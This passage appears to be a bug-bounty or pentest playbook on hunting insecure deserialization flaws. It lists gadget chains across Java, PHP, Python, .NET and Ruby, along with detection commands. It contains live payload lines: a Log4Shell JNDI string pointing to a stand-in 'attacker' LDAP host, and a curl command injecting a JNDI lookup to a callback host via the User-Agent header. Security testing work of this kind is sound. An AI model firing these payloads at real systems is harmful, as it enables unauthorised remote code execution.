hunt-deserialization

# HUNT-DESERIALIZATION — Insecure Deserialization ## Crown Jewel Targets Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions. **Highest-value chains:** - **Java ysoserial gadget chains** — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution - **PHP Object Injection** — `__wakeup` / `__destruct` magic methods → file write / RCE - **Python pickle** — `pickle.loads(attacker_data)` → `__reduce__` → `os.system('id')` - **.NET BinaryFormatter** — TypeConfuseDelegate gadget chain → RCE - **Ruby Marshal.load** — Gem::Requirement, Gem::Installer gadgets → RCE - **JNDI injection** — Log4Shell pattern: `${jndi:ldap://attacker/a}` → class load → RCE --- ## Attack Surface Signals ### Detection Patterns ```bash # Java serialized objects start with AC ED 00 05 (hex) or rO0A (base64) echo "rO0ABXQ=" | base64 -d | xxd | head -1 # shows: ac ed 00 05 # PHP serialization: O:8:"stdClass":0:{} # Python pickle: starts with \x80\x04 (protocol 4) or \x80\x02 # Apache Shiro: rememberMe cookie present curl -sI https://$TARGET/ | grep -i "Set-Cookie.*rememberMe" # Log4j: test user-controlled fields for JNDI interpolation curl -H 'User-Agent: ${jndi:dns://COLLAB_HOST/a}' https://$TARGET/ ``` ### Header / Cookie Signals ``` Content-Type: application/x-java-serialized-object Cookie containing rO0= prefix (Java base64 serialized) Cookie: rememberMe= (Apache Shiro) Cookie: _VIEWSTATE (ASP.NET ViewState without encrypt...